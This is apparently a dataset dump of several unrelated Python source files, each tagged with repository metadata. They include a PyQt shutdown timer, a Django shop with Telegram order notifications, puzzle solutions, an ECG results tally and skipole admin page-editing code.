print(max(ans, 0)) | Aasthaengg/IBMdataset | Python_codes/p03372/s840505934.py | s840505934.py | py | 1,183 | python | en | code | 0 | github-code | 90 |
25212861337 | # -*- coding: utf-8 -*-
'''
Модули с описанием смежных классов
'''
from PyQt5.QtWidgets import QWidget, QDialog, QLabel, QPushButton, QVBoxLayout, QProgressBar
from PyQt5.QtGui import QFont
from PyQt5.QtCore import Qt, QObject, pyqtSignal, pyqtSlot
from work_lib import work_time, web_time, shutdown_lib
from work_setting import module, dialog
import datetime, time
#from win32com.test.testIterators import SomeObject
#организуем многопоточнсть (считываем с сайта или ловим выключение компьютера в отдельном потоке)
class ShowShutOrWeb(QObject):
#объявляем все сигналы
finished = pyqtSignal()
finished_global = pyqtSignal()
intReady = pyqtSignal(int)
start_shut = pyqtSignal(int)
show_wnd = pyqtSignal()
def ShutOrWeb(self):
#если выставлена галочка работы с сайтом - считываем сайт
if(int(module.read_setting(16))):
#запускаем функцию чтения данных с сайта марса во втором потоке
self.RunWeb()
#иначе работам через "отлов" включения/выключение компьютера
else:
#получаем текущую дату и время компа
tekdateandtimeStart = datetime.datetime.now()
tekyear = tekdateandtimeStart.year #Текущий год
tekmonth = tekdateandtimeStart.month #текущий месяц
tekday = tekdateandtimeStart.day #текущее число
tekhour = tekdateandtimeStart.hour #текущий час
tekminute = tekdateandtimeStart.minute #текущая минута
#учитываем смещение
min_offset = int(module.read_setting(10)) #получаем смещение
#вычитаем смещение из минут
if tekminute - min_offset >= 0:
tekminute = tekminute - min_offset
else:
tekhour = tekhour - 1
tekminute = 60 + (tekminute - min_offset)
#записываем время включения компьютера
work_time.start_work(tekminute, tekhour, tekday, tekmonth, tekyear)
#self.finished_global.emit()
#если функция вернет флаг выключения, то запустим окно с таймером на выключение ПК
@pyqtSlot()
def RunWeb(self):
flg_shut = web_time.web_main()
module.log_info("flg_shut: %s" % flg_shut)
if flg_shut == True:
module.write_setting(0, 28) #ставим признак штатного завершения
self.start_shut.emit(flg_shut) #посылаем сигнал на запуск таймера для выключения
self.finished_global.emit()
shutdown_lib.signal_shutdown()
#Основной метод счетчика выключения
@pyqtSlot()
def CountTime(self):
self.show_wnd.emit()
maxtime = 60
for count in range(maxtime+1):
step = maxtime - count
self.intReady.emit(step)
time.sleep(1)
self.finished.emit()
#класс для таймера выключения
class ShutWindow(QWidget):
def __init__(self):
super(ShutWindow, self).__init__()
#запуск формы
self.initUI()
def initUI(self):
self.resize(200,200) # Устанавливаем фиксированные размеры окна
self.setWindowFlags(Qt.FramelessWindowHint|Qt.WindowStaysOnTopHint) # окно без рамки
self.setAttribute(Qt.WA_TranslucentBackground) #окно прозрачное
self.lbl = QLabel(self) #лейбл приветствия
self.lbl.setFont(QFont('Arial', 12)) #Шрифт
self.lbl.setText('До выключения остальсь:')
self.lbl.adjustSize() #адаптивный размер в зависимости от содержимого
self.lbl_timer = QLabel(self) #лейбл со счетчиком
self.lbl_timer.setFont(QFont('Arial', 150)) #Шрифт
self.lbl_timer.setText('60')
self.lbl_timer.setStyleSheet('color: red') #цвет текста красный
self.btn_stop = QPushButton('Остановить\nвыключение', self) #остановки счетчика
self.btn_stop.setFont(QFont('Arial', 12)) #Шрифт
self.btn_stop.clicked.connect(self.close_programm) #действие по нажатию
#расположение в окне
self.v_box = QVBoxLayout()
self.v_box.addWidget(self.lbl)
self.v_box.addWidget(self.lbl_timer)
self.v_box.addWidget(self.btn_stop)
self.setLayout(self.v_box)
#запись счетчика в лейбл
def onShutReady(self, count):
self.lbl_timer.setText(str(count).rjust(2, '0'))
#отображение окна по сигналу
def on_show_wnd(self):
self.show()
#по нажатию кнопки выключаем программу
def close_programm(self):
ex = dialog.MainWindow()
ex.cleanUp()
##############################################################################################################
#объекты для потока с расчетом прогресса пересчета
class ThreadProgressRecount(QObject):
finished = pyqtSignal()
show_act = pyqtSignal()
count_changed = pyqtSignal(int) #сигнал для вывода прогресса перезаписи
not_recount = pyqtSignal()
donot_open = pyqtSignal()
finished_progress = pyqtSignal()
#функция для подсчета прогресса пересчета Exel файла
def ThreadRecount(self):
self.CountRecount()
@pyqtSlot()
def CountRecount(self):
#получаем массив годов
try:
exel_year = work_time.exel_year() #на существование файла
except:
self.donot_open.emit()
self.finished.emit()
self.finished_progress.emit()
return
step = 100/len(exel_year)
count = 0
self.show_act.emit()
self.count_changed.emit(count)
#в цикле вычисляем количество рабочих часов в каждом из месяцев в году
for i in range(len(exel_year)):
try:
result = work_time.year_recount(int(exel_year[i]))
#если пересчет не удался
if result == False:
self.not_recount.emit()
break
except:
self.not_recount.emit()
break
count = count + step
self.count_changed.emit(count)
self.finished.emit()
self.finished_progress.emit()
#окно с прогрессом пересчета
class ProgressRecount(QDialog):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
#окно без рамки
self.resize(400, 50)
self.setWindowFlags(Qt.FramelessWindowHint) # окно без рамки
self.setAttribute(Qt.WA_TranslucentBackground) #окно прозрачное
#создаем ползунок прогресса
self.pbar = QProgressBar(self)
self.pbar.setFont(QFont('Arial', 14))
self.pbar.setValue(0)
#запихиваем его в окно
self.vbox = QVBoxLayout()
self.vbox.addWidget(self.pbar)
self.setLayout(self.vbox)
#функция для которой расчитывается прогресс
def doAction(self, value):
self.pbar.setValue(value)
if value >= 100:
time.sleep(1) #для того что бы было видно 100%
#показываем окно, блокируя другие
def on_show_act(self):
self.exec()
| SelYui/working-hours | work_setting/adjacent_classes.py | adjacent_classes.py | py | 8,730 | python | ru | code | 0 | github-code | 90 |
25589025634 | import os
from absl.testing import absltest
from framework import xds_url_map_testcase # Needed for xDS flags
_TEST_CASE_FOLDER = os.path.dirname(__file__)
def load_tests(loader: absltest.TestLoader, unused_tests, unused_pattern):
return loader.discover(
_TEST_CASE_FOLDER,
pattern="*" + xds_url_map_testcase.URL_MAP_TESTCASE_FILE_SUFFIX,
)
if __name__ == "__main__":
absltest.main()
| grpc/grpc | tools/run_tests/xds_k8s_test_driver/tests/url_map/__main__.py | __main__.py | py | 420 | python | en | code | 39,468 | github-code | 90 |
19502849374 | import csv
disease_lsit = ['AF', 'BBB', 'TAC', 'normal']
file_path = 'D:/data/ECG/result/20210330/'
file_path_AF = file_path + 'AF.csv'
file_path_BBB = file_path + 'BBB.csv'
file_path_TAC = file_path + 'TAC.csv'
file_path_normal = file_path + 'normal.csv'
def read_file(file_path):
result = []
with open(file_path) as f:
csv_reader = csv.reader(f)
next(csv_reader)
for row in csv_reader:
result.append([row[0], float(row[1]), float(row[2]), float(row[3]), float(row[4])])
return result
def add_data(data, some_result, groud_truth):
assert groud_truth in disease_lsit
for record in some_result:
if record[0] not in data.keys():
data[record[0]] = {'prob': [record[1], record[2], record[3], record[4]],
'ground_truth': [groud_truth]}
else:
assert data[record[0]]['prob'] == [record[1], record[2], record[3], record[4]]
data[record[0]]['ground_truth'].append(groud_truth)
return data
def guess(data):
for item in data.values():
item['guess'] = []
if item['prob'][0] > 0.1:
item['guess'].append('AF')
if item['prob'][1] > 0.1:
item['guess'].append('BBB')
if item['prob'][2] > 0.1:
item['guess'].append('TAC')
if len(item['guess']) == 0:
item['guess'].append('normal')
return data
AF_result = read_file(file_path_AF)
BBB_result = read_file(file_path_BBB)
TAC_result = read_file(file_path_TAC)
normal_result = read_file(file_path_normal)
data = {}
data = add_data(data, AF_result, 'AF')
data = add_data(data, BBB_result, 'BBB')
data = add_data(data, TAC_result, 'TAC')
data = add_data(data, normal_result, 'normal')
data = guess(data)
tp_AF = 0
tp_BBB = 0
tp_TAC = 0
error = 0
# error_AF = 0
# error_BBB = 0
# error_TAC = 0
error_normal = 0
for key, value in data.items():
if 'AF' in value['ground_truth'] and 'AF' in value['guess']:
tp_AF += 1
if 'BBB' in value['ground_truth'] and 'BBB' in value['guess']:
tp_BBB += 1
if 'TAC' in value['ground_truth'] and 'TAC' in value['guess']:
tp_TAC += 1
if 'normal' in value['ground_truth'] and 'normal' not in value['guess']:
error_normal += 1
if len(list(set(value['ground_truth']).intersection(set(value['guess'])))) == 0:
error += 1
print(tp_AF/3000)
print(tp_BBB/3000)
print(tp_TAC/3000)
print((3000 - error_normal)/3000)
print(error/len(data))
| hezhongyu/EEG | exps/temp.py | temp.py | py | 2,495 | python | en | code | 0 | github-code | 90 |
73888829418 | from decimal import Decimal
n = int(input())
ab = [list(map(int, input().split())) for _ in range(n)]
data = []
for i in range(n):
a, b = ab[i]
data.append((-Decimal(a) / Decimal(a + b), i))
data.sort()
print(*[x[1] + 1 for x in data])
| ia7ck/competitive-programming | AtCoder/abc308/c/main.py | main.py | py | 247 | python | en | code | 0 | github-code | 90 |
73620508137 | class Solution:
# @param {string} path
# @return {string}
def simplifyPath(self, path):
stack = []
res = ''
for i in range(len(path)):
end = i + 1
while end < len(path) and path[end] != '/':
end += 1
sub = path[i+1:end]
if len(sub) > 0:
if sub == '..':
if stack:
stack.pop()
elif sub != '.':
stack.append(sub)
i = end
if not stack:
return '/'
for i in stack:
res += '/' + i
return res
"""
# ******* The Second Time *********
# 解题思路:题目的要求是输出Unix下的最简路径,Unix文件的根目录为"/","."表示当前目录,".."表示上级目录。
# 使用一个栈来解决问题。遇到'..'弹栈,遇到'.'不操作,其他情况下压栈。
"""
class Solution(object):
def simplifyPath(self, path):
"""
:type path: str
:rtype: str
"""
stack = ['/']
for i in path.split('/'):
if i == '.' or i =='':continue
elif i == '..':
if len(stack) > 1: # 为0 没有可pop的
stack.pop()
else:
stack.append(i+'/')
if len(stack) > 1:
return ''.join(stack).rstrip('/') # 尾部移掉'/'
else:
return ''.join(stack)
| xiangzuo2022/leetcode_python | python/71.simplify_path.py | 71.simplify_path.py | py | 1,374 | python | en | code | 0 | github-code | 90 |
17374932941 | import requests
from django.shortcuts import render, redirect
from django.views.generic.base import View
from .forms import NewOrdertForm
from .models import Category, Product, ShopInfo, TelegramBot
from main.models import Contact
def catalog(request):
"""Страница каталог"""
products = Product.objects.all()
categories = Category.objects.all()
info = ShopInfo.objects.last()
return render(request, 'catalog.html', {
'products': products,
'info': info,
'categories': categories,
})
class ProductDetailView(View):
"""Страница товара"""
def get(self, request, pk):
product = Product.objects.get(id=pk)
contact = Contact.objects.last()
description = product.description[3:160]
return render(request, 'product_detail.html', {
'product': product,
'contact': contact,
'description': description,
})
class CreateOrder(View):
"""Страница заказа товара"""
def get(self, request, pk):
product = Product.objects.get(id=pk)
return render(request, 'order.html', {
'product': product
})
def post(self, request, pk):
form = NewOrdertForm(request.POST)
bot = TelegramBot.objects.last()
if form.is_valid():
form.save()
success = True
url = f'{bot.url}' + '/sendMessage'
chat_id = bot.chat_id
product = request.POST.get('product')
name = request.POST.get('name')
phone = request.POST.get('phone')
comment = request.POST.get('comment')
price = request.POST.get('price')
text = f'Новая заявка: \n Товар: {product} \n Цена: {price} \n Имя: {name} \n Телефон: {phone} \n Дополнительно: {comment}'
answer = {'chat_id': chat_id, 'text': text}
requests.post(url, answer)
return render(request, 'thanks.html', {
'success': success,
})
return redirect('product_detail') | Eldar1988/mir_divanov | HelloDjango/shop/views.py | views.py | py | 2,142 | python | en | code | 0 | github-code | 90 |
18066593969 | import math
import collections
import fractions
import itertools
import functools
import operator
def solve():
s = input()
edge = collections.deque()
for i in s:
if i == "0":
edge.append("0")
elif i == "1":
edge.append("1")
elif len(edge) > 0:
edge.pop()
print("".join(edge))
return 0
if __name__ == "__main__":
solve()
| Aasthaengg/IBMdataset | Python_codes/p04030/s077220293.py | s077220293.py | py | 406 | python | en | code | 0 | github-code | 90 |
39804163775 | # -*- coding:utf-8 -*-
from websocket import create_connection
import sys
import io
import picamera
import numpy as np
import base64
import cv2
CAMERA_WIDTH = 320
CAMERA_HEIGHT = 240
stream = io.BytesIO()
camera = picamera.PiCamera()
camera.resolution = (CAMERA_WIDTH,CAMERA_HEIGHT)
def Capture():
camera.capture(stream, format = 'jpeg')
data = stream.getvalue()
stream.seek(0)
return data
if __name__ == '__main__':
ws = create_connection("ws://192.168.10.54:8000/websocket")
print("Connection is started")
#data = "hello"
while True:
ws.send(Capture().encode('base64'))
ans = ws.recv()
print(ans)
if ans == "found!":
break
ws.close()
| YonDeraPP/sotsuken | ws_client.py | ws_client.py | py | 723 | python | en | code | 0 | github-code | 90 |
22126271946 | # You will be given a number and you will need to return it as a string in Expanded Form. For example:
# expanded_form(12) # Should return '10 + 2'
# expanded_form(42) # Should return '40 + 2'
# expanded_form(70304) # Should return '70000 + 300 + 4'
# NOTE: All numbers will be whole numbers greater than 0.
def expanded_form(num):
baseNum = str(num)
newNum = ''
count = 1
for l in range(len(baseNum)):
if baseNum[l]=='0': count+=1; continue
newNum += '{0}{1} + '.format(baseNum[l], '0'*(len(baseNum)-l-1))
count+=1
return newNum[0:len(newNum)-3] | cloudkevin/codewars | expandedFormNumber.py | expandedFormNumber.py | py | 559 | python | en | code | 1 | github-code | 90 |
9512423407 | import numpy as np
INPUT = """467..114..
...*......
..35..633.
......#...
617*......
.....+.58.
..592.....
......755.
...$.*....
.664.598.."""
def parse_grid(input):
return np.asarray([list(line) for line in input.split('\n')])
def find_gear_candidates(grid):
candidates = []
for i in range(grid.shape[0]):
for j in range(grid.shape[1]):
if '*' == grid[i, j]:
candidates.append((i, j))
return candidates
def find_number_starts(grid):
number_starts = []
for i in range(grid.shape[0]):
prev_is_number = False
for j in range(grid.shape[1]):
if grid[i, j].isnumeric():
if not prev_is_number:
number_starts.append((i, j))
prev_is_number = True
else:
prev_is_number = False
return number_starts
def find_number_starting_at(grid, number_start):
number = []
for c in grid[number_start[0], number_start[1]:]:
if c.isnumeric():
number.append(int(c))
else:
break
return number
def has_surrounding_symbol(grid, number_start):
number_len = len(find_number_starting_at(grid, number_start))
start_row = max(number_start[0]-1, 0)
end_row = min(number_start[0]+2, grid.shape[0]+1)
start_col = max(number_start[1]-1, 0)
end_col = min(number_start[1]+number_len+2, grid.shape[1]+1)
sub_grid = grid[start_row:end_row, start_col:end_col]
# print(sub_grid)
for i in range(sub_grid.shape[0]):
for j in range(sub_grid.shape[1]):
c = sub_grid[i, j]
if not c.isnumeric() and c != '.':
return True
return False
def has_two_surrounding_numbers(grid, pos):
number_len = len(find_number_starting_at(grid, pos))
start_row = max(pos[0]-1, 0)
end_row = min(pos[0]+2, grid.shape[0]+1)
start_col = max(pos[1]-1, 0)
end_col = min(pos[1]+number_len+2, grid.shape[1]+1)
sub_grid = grid[start_row:end_row, start_col:end_col]
# print(sub_grid)
surrounding_numbers = 0
for i in range(sub_grid.shape[0]):
prev_is_number = False
for j in range(sub_grid.shape[1]):
c = sub_grid[i, j]
if c.isnumeric():
if not prev_is_number:
surrounding_numbers += 1
prev_is_number = True
else:
prev_is_number = False
# print(surrounding_numbers)
return 2 == surrounding_numbers
def get_numbers_with_surrounding_symbols(grid):
numbers = []
number_starts = find_number_starts(grid)
# [print(has_surrounding_symbol(grid, number_start), '\n') for number_start in number_starts]
for number_start in number_starts:
if has_surrounding_symbol(grid, number_start):
number_list = find_number_starting_at(grid, number_start)
number = 0
for i, digit in enumerate(number_list[::-1]):
number += digit * 10**i
numbers.append(number)
return numbers
def is_adjacent_to_gear(grid, number_start, gear):
number_len = len(find_number_starting_at(grid, number_start))
start_row = max(number_start[0]-1, 0)
end_row = min(number_start[0]+2, grid.shape[0]+1)
start_col = max(number_start[1]-1, 0)
end_col = min(number_start[1]+number_len+1, grid.shape[1]+1)
sub_grid = grid[start_row:end_row, start_col:end_col]
# print(sub_grid)
for i in range(sub_grid.shape[0]):
for j in range(sub_grid.shape[1]):
if (i+start_row, j+start_col) == gear:
return True
return False
def get_numbers_adjacent_to_gear(grid, number_starts, gear):
numbers = []
# [print(has_surrounding_symbol(grid, number_start), '\n') for number_start in number_starts]
for number_start in number_starts:
if is_adjacent_to_gear(grid, number_start, gear):
number_list = find_number_starting_at(grid, number_start)
number = 0
for i, digit in enumerate(number_list[::-1]):
number += digit * 10**i
numbers.append(number)
return numbers
def get_gears(grid):
return [candidate for candidate in find_gear_candidates(grid) if has_two_surrounding_numbers(grid, candidate)]
if __name__ == '__main__':
input_grid = parse_grid(INPUT)
gears = get_gears(input_grid)
number_starts = find_number_starts(input_grid)
numbers_adjacent_to_gears = [get_numbers_adjacent_to_gear(input_grid, number_starts, gear) for gear in gears]
# --- part 1 ---
print(sum(get_numbers_with_surrounding_symbols(input_grid)))
# --- part 2 ---
print(sum([pair[0]*pair[1] for pair in numbers_adjacent_to_gears]))
| iptch/2023-advent-of-code | DHE/day3.py | day3.py | py | 4,759 | python | en | code | 2 | github-code | 90 |
22074328125 |
"Functions implementing respond page editing"
import collections
from .... import editresponder, utils
from skipole import ValidateError, FailPage, ServerError, GoTo, SectionData
from .. import adminutils
def _ident_to_str(ident):
"Returns string ident or label"
if ident is None:
return ''
if isinstance(ident, str):
return ident
# ident must be a list or tuple of (project,number)
if len(ident) != 2:
raise FailPage("Invalid ident")
return ident[0] + "," + str(ident[1])
def _field_to_string(wfield):
"Returns two forms of a widgfield, or if a string, then just the string twice"
if isinstance(wfield, str):
return wfield, wfield
# a widgfield has four elements, reduce it to the non empty elements
shortwfield = [ w for w in wfield if w ]
if len(shortwfield) == 1:
return shortwfield[0], shortwfield[0]
wf1 = ",".join(shortwfield)
if len(shortwfield) == 2:
wf2 = shortwfield[0] + ":" + shortwfield[1]
else:
wf2 = shortwfield[0] + "-" + shortwfield[1] + ":" + shortwfield[2]
return wf1, wf2
def _t_ref(r_info, item):
"Returns a TextBlock ref for the given item"
return ".".join(["responders", r_info.module_name, r_info.responder, item])
def fail_page_help(skicall):
"Retrieves help text for the fail page ident"
text = skicall.textblock("responders.fail_page")
if not text:
text = "No help text for responders.fail_page has been found"
pd = skicall.call_data['pagedata']
# Fill in header
sd_adminhead = SectionData("adminhead")
sd_adminhead["show_help","para_text"] = "\n" + text
sd_adminhead["show_help","hide"] = False
pd.update(sd_adminhead)
def submit_data_help(skicall):
"Retrieves help text for the submit_data function"
call_data = skicall.call_data
if 'page_number' in call_data:
pagenumber = call_data['page_number']
else:
raise FailPage(message = "page missing")
try:
project = call_data['editedprojname']
# get a ResponderInfo named tuple with information about the responder
r_info = editresponder.responder_info(project, pagenumber, call_data['pchange'])
except ServerError as e:
raise FailPage(message=e.message)
sdtextref = _t_ref(r_info, 'submit_data')
text = skicall.textblock(sdtextref)
if not text:
text = "No help text for %s has been found" % sdtextref
pd = call_data['pagedata']
# Fill in header
sd_adminhead = SectionData("adminhead")
sd_adminhead["show_help","para_text"] = "\n" + text
sd_adminhead["show_help","hide"] = False
pd.update(sd_adminhead)
def submit_dict_help(skicall):
"Retrieves help text for the responder submit_dict"
call_data = skicall.call_data
if 'page_number' in call_data:
pagenumber = call_data['page_number']
else:
raise FailPage(message = "page missing")
try:
project = call_data['editedprojname']
# get a ResponderInfo named tuple with information about the responder
r_info = editresponder.responder_info(project, pagenumber, call_data['pchange'])
except ServerError as e:
raise FailPage(message=e.message)
sdtextref = _t_ref(r_info, 'submit_dict')
text = skicall.textblock(sdtextref)
if not text:
text = "No help text for %s has been found" % sdtextref
pd = call_data['pagedata']
# Fill in header
sd_adminhead = SectionData("adminhead")
sd_adminhead["show_help","para_text"] = "\n" + text
sd_adminhead["show_help","hide"] = False
pd.update(sd_adminhead)
def call_data_help(skicall):
"Retrieves help text for the responder call_data"
call_data = skicall.call_data
if 'page_number' in call_data:
pagenumber = call_data['page_number']
else:
raise FailPage(message = "page missing")
try:
project = call_data['editedprojname']
# get a ResponderInfo named tuple with information about the responder
r_info = editresponder.responder_info(project, pagenumber, call_data['pchange'])
except ServerError as e:
raise FailPage(message=e.message)
cdtextref = _t_ref(r_info, 'call_data')
text = skicall.textblock(cdtextref)
if not text:
text = "No help text for %s has been found" % cdtextref
pd = call_data['pagedata']
# Fill in header
sd_adminhead = SectionData("adminhead")
sd_adminhead["show_help","para_text"] = "\n" + text
sd_adminhead["show_help","hide"] = False
pd.update(sd_adminhead)
def retrieve_edit_respondpage(skicall):
"Retrieves widget data for the edit respond page"
call_data = skicall.call_data
pd = call_data['pagedata']
# clears any session data, keeping page_number, pchange and any status message
adminutils.clear_call_data(call_data, keep=["page_number", "pchange", "status"])
if 'page_number' in call_data:
pagenumber = call_data['page_number']
str_pagenumber = str(pagenumber)
else:
raise FailPage(message = "page missing")
try:
project = call_data['editedprojname']
pageinfo = utils.page_info(project, pagenumber)
if pageinfo.item_type != 'RespondPage':
raise FailPage(message = "Invalid page")
call_data['pchange'] = pageinfo.change
# Fill in header
sd_adminhead = SectionData("adminhead")
sd_adminhead["page_head","large_text"] = pageinfo.name
sd_adminhead["map","show"] = True
pd.update(sd_adminhead)
# fills in the data for editing page name, brief, parent, etc.,
sd_page_edit = SectionData("page_edit")
sd_page_edit['p_ident','span_text'] = f"{project},{str_pagenumber}"
sd_page_edit['p_name','page_ident'] = (project,str_pagenumber)
sd_page_edit['p_description','page_ident'] = (project,str_pagenumber)
sd_page_edit['p_rename','input_text'] = pageinfo.name
sd_page_edit['p_parent','input_text'] = "%s,%s" % (project, pageinfo.parentfolder_number)
sd_page_edit['p_brief','input_text'] = pageinfo.brief
pd.update(sd_page_edit)
# get a ResponderInfo named tuple with information about the responder
r_info = editresponder.responder_info(project, pagenumber, call_data['pchange'])
except ServerError as e:
raise FailPage(message=e.message)
pd['respondertype','para_text'] = "This page is a responder of type: %s." % (r_info.responder,)
pd['responderdescription','textblock_ref'] = ".".join(["responders",r_info.module_name, r_info.responder])
if r_info.widgfield_required:
sd_setwidgfield = SectionData("setwidgfield")
sd_setwidgfield['widgfieldform', 'action'] = "responder_widgfield"
sd_setwidgfield.show = True
if r_info.widgfield:
pd['widgfield','input_text'] = r_info.widgfield
widg = r_info.widgfield.split(',')
if len(widg) == 3:
sd_setwidgfield['respondersection','input_text'] = widg[0]
sd_setwidgfield['responderwidget','input_text'] = widg[1]
sd_setwidgfield['responderfield','input_text'] = widg[2]
elif len(widg) == 2:
sd_setwidgfield['respondersection','input_text'] = ''
sd_setwidgfield['responderwidget','input_text'] = widg[0]
sd_setwidgfield['responderfield','input_text'] = widg[1]
else:
sd_setwidgfield['respondersection','input_text'] = ''
sd_setwidgfield['responderwidget','input_text'] = ''
sd_setwidgfield['responderfield','input_text'] = ''
else:
sd_setwidgfield['respondersection','input_text'] = ''
sd_setwidgfield['responderwidget','input_text'] = ''
sd_setwidgfield['responderfield','input_text'] = ''
pd.update(sd_setwidgfield)
else:
pd['widgfield','show'] = False
# alternate ident
if r_info.alternate_ident_required:
sd_alternate = adminutils.formtextinput( "alternate_ident", # section alias
_t_ref(r_info, 'alternate_ident'), # textblock
"Set an alternate ident:", # field label
_ident_to_str(r_info.alternate_ident), # input text
action = "alternate_ident",
action_json = "alternate_ident_json",
left_label = "Submit the ident : ")
pd.update(sd_alternate)
# target ident
if r_info.target_ident_required:
sd_target = adminutils.formtextinput("target_ident", # section alias
_t_ref(r_info, 'target_ident'), # textblock
"Set the target ident:", # field label
_ident_to_str(r_info.target_ident), # input text
action = "set_target_ident",
action_json = "set_target_ident_json",
left_label = "Submit the ident : ")
pd.update(sd_target)
# allowed callers
if r_info.allowed_callers_required:
pd['allowed_callers_description','textblock_ref'] = _t_ref(r_info, 'allowed_callers_list')
if r_info.allowed_callers:
contents = []
for ident in r_info.allowed_callers:
ident_row = [_ident_to_str(ident), _ident_to_str(ident).replace(",","_")]
contents.append(ident_row)
pd['allowed_callers_list','contents'] = contents
else:
pd['allowed_callers_list','show'] = False
sd_allowed_caller = adminutils.formtextinput("allowed_caller", # section alias
_t_ref(r_info, 'allowed_callers'), # textblock
"Add an allowed caller ident or label:", # field label
"", # input text
action = "add_allowed_caller",
left_label = "Add the allowed caller : ")
pd.update(sd_allowed_caller)
else:
pd['allowed_callers_description','show'] = False
pd['allowed_callers_list','show'] = False
# validate option
if r_info.validate_option_available:
pd['val_option_desc', 'textblock_ref'] = _t_ref(r_info, 'validate_option')
if r_info.validate_option:
pd['set_val_option','button_text'] = "Disable Validation"
pd['val_status','para_text'] = "Validate received field values : Enabled"
pd['validate_fail', 'input_text'] = _ident_to_str(r_info.validate_fail_ident)
pd['validate_fail', 'hide'] = False
else:
pd['set_val_option','button_text'] = "Enable Validation"
pd['val_status','para_text'] = "Validate received field values : Disabled"
pd['validate_fail', 'hide'] = True
else:
pd['val_option_desc','show'] = False
pd['set_val_option','show'] = False
pd['val_status','show'] = False
pd['validate_fail', 'show'] = False
# submit option
if r_info.submit_option_available:
pd['submit_option_desc','textblock_ref'] = _t_ref(r_info, 'submit_option')
if r_info.submit_option:
pd['set_submit_option','button_text'] = 'Disable submit_data'
pd['submit_status','para_text'] = "Call submit_data : Enabled"
else:
pd['set_submit_option','button_text'] = 'Enable submit_data'
pd['submit_status','para_text'] = "Call submit_data : Disabled"
else:
pd['submit_option_desc','show'] = False
pd['set_submit_option','show'] = False
pd['submit_status','show'] = False
if r_info.submit_required or r_info.submit_option:
pd['submit_list_description','textblock_ref'] = 'responders.about_submit_list'
if r_info.submit_list:
contents = []
for index, s in enumerate(r_info.submit_list):
s_row = [s, str(index), str(index), str(index)]
contents.append(s_row)
pd['submit_list','contents'] = contents
else:
pd['submit_list','hide'] = True
pd['submit_string','input_text'] = ''
# fail page
sd_failpage = adminutils.formtextinput( "failpage", # section alias
'responders.shortfailpage', # textblock
"Fail page ident or label:", # field label
_ident_to_str(r_info.fail_ident), # input text
action = "set_fail_ident",
left_label = "Set the fail page : ")
pd.update(sd_failpage)
else:
pd['submit_list_description','show'] = False
pd['submit_list','show'] = False
pd['submit_string','show'] = False
pd['submit_info','show'] = False
# final paragraph
pd['final_paragraph','textblock_ref'] = _t_ref(r_info, 'final_paragraph')
# field sections have show = False by default, so the appropriate section
# to be shown is set here with show = True
# field options
f_options = r_info.field_options
if not f_options['fields']:
# no fields so no further data to input
return
# the fields option is enabled
if f_options['single_field']:
if f_options['field_values']:
# single field and value
if r_info.single_field_value:
fieldname, fieldvalue = r_info.single_field_value
else:
fieldname = ''
fieldvalue = ''
sd_singlefieldvalue = adminutils.addsinglefieldval('addfieldval',
_t_ref(r_info, 'fields'), # textblock
skicall.textblock(_t_ref(r_info, 'addfieldlabel')),
skicall.textblock(_t_ref(r_info, 'addvaluelabel')),
fieldname,
fieldvalue,
action='add_field_value',
left_label='add :')
pd.update(sd_singlefieldvalue)
else:
# single field, no value
if r_info.single_field:
fieldname = r_info.single_field
else:
fieldname = ''
sd_singlefield = adminutils.formtextinput( "singlefield", # section alias
_t_ref(r_info, 'fields'), # textblock
"Set the field name:", # field label
fieldname, # input text
action = "set_field",
left_label = "Submit the field : ")
pd.update(sd_singlefield)
return
# to get here single_field is not enabled
if f_options['field_values']:
pd['field_values_list','show'] = True
# populate field_values_list
contents = []
field_vals = r_info.field_values_list
for field, value in field_vals:
f1,f2 = _field_to_string(field)
v1,v2 = _field_to_string(value)
if not v1:
v1 = "' '"
row = [f1, v1, f2]
contents.append(row)
if contents:
contents.sort()
pd['field_values_list','contents'] = contents
else:
pd['field_values_list','show'] = False
# populate the widgfieldval section
if f_options['widgfields']:
if f_options['field_keys']:
sd_widgfieldval = adminutils.widgfieldval('widgfieldval',
_t_ref(r_info, 'fields'),
"key to be used in call_data:",
action='add_widgfield_value',
left_label='Add the key :')
else:
sd_widgfieldval = adminutils.widgfieldval('widgfieldval',
_t_ref(r_info, 'fields'),
"Widget/field value:",
action='add_widgfield_value',
left_label='submit value :')
pd.update(sd_widgfieldval)
else:
### f_options['field_values'] is True, but not f_options['widgfields']
sd_addfieldval = adminutils.addfieldval('addfieldval',
_t_ref(r_info, 'fields'), # textblock
skicall.textblock(_t_ref(r_info, 'addfieldlabel')),
skicall.textblock(_t_ref(r_info, 'addvaluelabel')),
action='add_field_value',
left_label='add :')
pd.update(sd_addfieldval)
else:
# so now add fields, without values
pd['field_list','show'] = True
# populate field_list
contents = []
field_vals = r_info.field_list
for field in field_vals:
f1,f2 = _field_to_string(field)
row = [f1, f2]
contents.append(row)
if contents:
contents.sort()
pd['field_list','contents'] = contents
else:
pd['field_list','show'] = False
# populate add_field
if f_options['widgfields']:
sd_addwidgfield = adminutils.widgfield('addwidgfield',
_t_ref(r_info, 'fields'),
action='add_widgfield',
left_label='Add the widget :')
pd.update(sd_addwidgfield)
else:
# this never called as there is no responder yet with the combination of
# both f_options['field_values']==False and f_options['widgfields']==False
pass
def submit_widgfield(skicall):
"Sets widgfield"
call_data = skicall.call_data
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
if ('setwidgfield','responderwidget','input_text') not in call_data:
raise FailPage(message="No widget name given")
if not call_data['setwidgfield','responderwidget','input_text']:
raise FailPage(message="No widget name given")
widgfield = call_data['setwidgfield','responderwidget','input_text']
if ('setwidgfield','responderfield','input_text') not in call_data:
raise FailPage(message="No widget field given")
if not call_data['setwidgfield','responderfield','input_text']:
raise FailPage(message="No widget field given")
widgfield = widgfield + "," + call_data['setwidgfield','responderfield','input_text']
if ('setwidgfield','respondersection','input_text') in call_data:
if call_data['setwidgfield','respondersection','input_text']:
widgfield = call_data['setwidgfield','respondersection','input_text'] + ',' + widgfield
try:
call_data['pchange'] = editresponder.set_widgfield(project, pagenumber, pchange, widgfield)
except ServerError as e:
raise FailPage(e.message)
call_data['status'] = 'WidgField set'
def submit_alternate_ident(skicall):
"Sets the alternate page"
call_data = skicall.call_data
pd = call_data['pagedata']
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
if not 'alternate_ident' in call_data:
raise FailPage(message="No alternate page label given")
if not call_data['alternate_ident']:
raise FailPage(message="No alternate page label given")
# Set the page alternate_ident
try:
call_data['pchange'] = editresponder.set_alternate_ident(project, pagenumber, pchange, call_data['alternate_ident'])
except ServerError as e:
raise FailPage(e.message)
